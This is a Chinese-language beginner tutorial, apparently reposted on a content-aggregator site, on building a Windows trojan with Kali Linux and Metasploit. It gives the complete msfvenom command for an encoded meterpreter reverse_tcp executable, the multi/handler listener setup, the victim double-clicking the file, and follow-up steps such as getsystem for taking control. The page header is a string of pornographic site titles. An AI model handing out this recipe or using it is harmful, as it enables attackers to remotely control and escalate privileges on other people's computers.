日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

kali-使用Metaspoit制作木马

發(fā)布時(shí)間:2024/1/18 编程问答 48 豆豆
生活随笔 收集整理的這篇文章主要介紹了 kali-使用Metaspoit制作木马 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

-**

本人是個(gè)新手,寫寫筆記。 如果那里有錯(cuò)誤或者語言不妥的地方。

請(qǐng)給予斧正!萬分感謝!

**

寫在最前面

網(wǎng)絡(luò)中的日新月異,時(shí)常會(huì)有更新,下面是針對(duì)msf和kali的更新方式
msf中有許多可用的攻擊載荷,如果不及時(shí)更新會(huì)導(dǎo)致對(duì)新系統(tǒng)漏洞的不了解
首先要更新kali:
經(jīng)典三連

apt-get update apt-get upgrade & apt-get dist-upgrade 強(qiáng)行三連 apt-get clean

重啟一下就可以了 reboot 完成kali的整體更新

其次,單獨(dú)的對(duì)msf框架進(jìn)行更新

msfupdate

以上就是kali的更新!

下面看完文章,會(huì)很好奇這個(gè)windows/meterpreter/reverse_tcp 這個(gè)是從哪里來的?
這個(gè)其實(shí)是msf框架中的針對(duì)windows的一個(gè)攻擊載荷
如何查看全部攻擊載荷或者篩選出我需要的載荷?

  • 首先進(jìn)入msfconsole
  • show -h 可以幫助你分類查找
    輸入 show all 命令就可以查看所有的配置選項(xiàng)
    再往下就是攻擊載荷
    可以使用 show payload 命令之查看現(xiàn)在可用的
    你可以找到文章中的windows/meterpreter/reverse_tcp這個(gè)payload
    這里面有 windows linux還有安卓的等等,根據(jù)需要來使用

    在這片文章的后面,也就是先使用msfvemon制作出木馬,在進(jìn)入msfconsole的設(shè)置
    如何判斷當(dāng)前的也就是我們選中的攻擊載荷是否對(duì)目標(biāo)操作系統(tǒng)具有有效的攻擊?
    使用windows/meterpreter/reverse_tcp來舉例子
    注意我紅框的位置,這里就是目標(biāo)操作系統(tǒng)的范圍
    怎么查看?
    使用 show targets命令查看對(duì)那些操作系統(tǒng)有用

    這里只有ID 0一個(gè)選項(xiàng),要是有多個(gè)選項(xiàng)就是ID 0/ID 1 /ID 2這種格式
    使用 set id 0/1/2 命令來選擇需要的操作系統(tǒng)
  • 首先,我們要先知道木馬的使用過程,然后我們才能制作出木馬

    • 木馬:控制端(我們)
    • 被控制端(倒霉蛋們)
    • 虛擬機(jī)的kali
    • 打開終端
    • 使用msfvenom -p命令來制作(因?yàn)槲矣玫氖莐ali2.0所以和1.0的版本不一樣)
    • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe > asd.exe
    • 看不明白?不要慌!
    • windows/meterpreter/reverse_tcp ->大體看出來這是windows下的tcp的一個(gè)漏洞(強(qiáng)大的Metaspoit自帶多種漏洞,需要什么自行百度就ok)
    • -e x86/shikata_ga_nai ->這是編碼方式(我的windows7是64位的,所以要選擇對(duì)應(yīng)的編碼格式。否則,生成可執(zhí)行文件再打開時(shí)就會(huì)出現(xiàn)錯(cuò)誤!)
    • -i 5 ->編碼次數(shù)
    • -b ->就是避免出現(xiàn)的值
    • -f exe ->生成.exe的可執(zhí)行文件
    • asd.exe > 文件名.exe
    • LHOST ->這是填寫自己本機(jī)的IP(因?yàn)檫@種木馬是用反彈機(jī)制)
    • LPORT ->填寫自己的端口
    • 回車運(yùn)行!
    • 我們可以看到,它生成一個(gè)434b的可執(zhí)行文件
    • 問題來了!生成的文件在哪里?
    • 使用ls命令查看,生成在當(dāng)前目錄下
    • 然后,將生成文件復(fù)制到windows下
    • 第二步
    • 配置接收木馬上線的設(shè)置
    • 打開Metaspoit
    • 打開的命令為 msfconsole
    • 我們就要開始輸入命令了
    • msf > use exploit/multi/handler
    • 我們使用handler模塊
    • msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    • 打開handler模塊后,設(shè)置我們制作時(shí)用的木馬漏洞
    • 這里就顯示設(shè)置成功
    • 我們現(xiàn)在就要設(shè)置接收的IP和端口
    • 輸入命令
    • msf exploit(handler) > show options
    • 顯示,我們需要填寫什么設(shè)置
    • 大家還記得我們制作木馬時(shí),填寫的ip和端口吧
    • 一定要對(duì)應(yīng)
    • msf exploit(handler) > set LHOST 192.168.1.108
    • 使用set來依次設(shè)置
    • msf exploit(handler) > set LPORT 5555
    • 成功設(shè)置后
    • 最后一步!
    • 輸入
    • msf exploit(handler) > exploit
    • 運(yùn)行,等待木馬上線
    • 我們?cè)趙indows下雙擊運(yùn)行
    • 木馬上線成功!
    • 接下來就可以進(jìn)行系統(tǒng)操作和文件操作
    • background 后臺(tái)運(yùn)行
    • sessions -i 查看后臺(tái)運(yùn)行會(huì)話
    • sessions -i ID號(hào)
    • getsystem

    總結(jié)

    以上是生活随笔為你收集整理的kali-使用Metaspoit制作木马的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。